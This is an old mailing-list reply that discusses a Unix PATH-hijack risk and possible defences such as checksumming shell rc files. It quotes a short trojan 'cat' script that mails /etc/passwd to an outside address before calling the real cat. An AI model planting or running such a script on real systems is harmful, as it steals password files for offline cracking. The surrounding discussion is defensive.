On Sun, 30 Aug 1998, Mike wrote:
{Snips}
}Now a hacker creates a script in that user's home directory, called cat,
}that does
}#!/bin/bash
}/bin/cat /etc/passwd | mail [EMAIL PROTECTED]
}/bin/cat $*
}
}Now the next time your user logs in, your password file gets mailed and
}the hacker can carry out a dictionary attack. Not good.
Internal script to run an MD5 check of your .*rc files? (Do it every n
minutes as a cron(tab?) item?
Makes me wonder about "rolling password" algorithms, that require a
different, deterministically-created (chaos better than CRC-type basis)
password at every logon. However, carrying around a programmable calc.
(or other hdwe.) to generate the current password is pretty bad.
I haven't yet had a PPP (or SLIP) account. The more I read, the more I
feel that a shell server at my ISP is a fairly-decent firewall!
|* Nicholas Bodley *|* Electronic Technician {*} Autodidact & Polymath
|* Waltham, Mass. *|* -----------------------------------------------
|* [EMAIL PROTECTED] *|* The personal computer industry will have become
|* Amateur musician *|* mature when crashes become unacceptable.
--------------------------------------------------------------------------
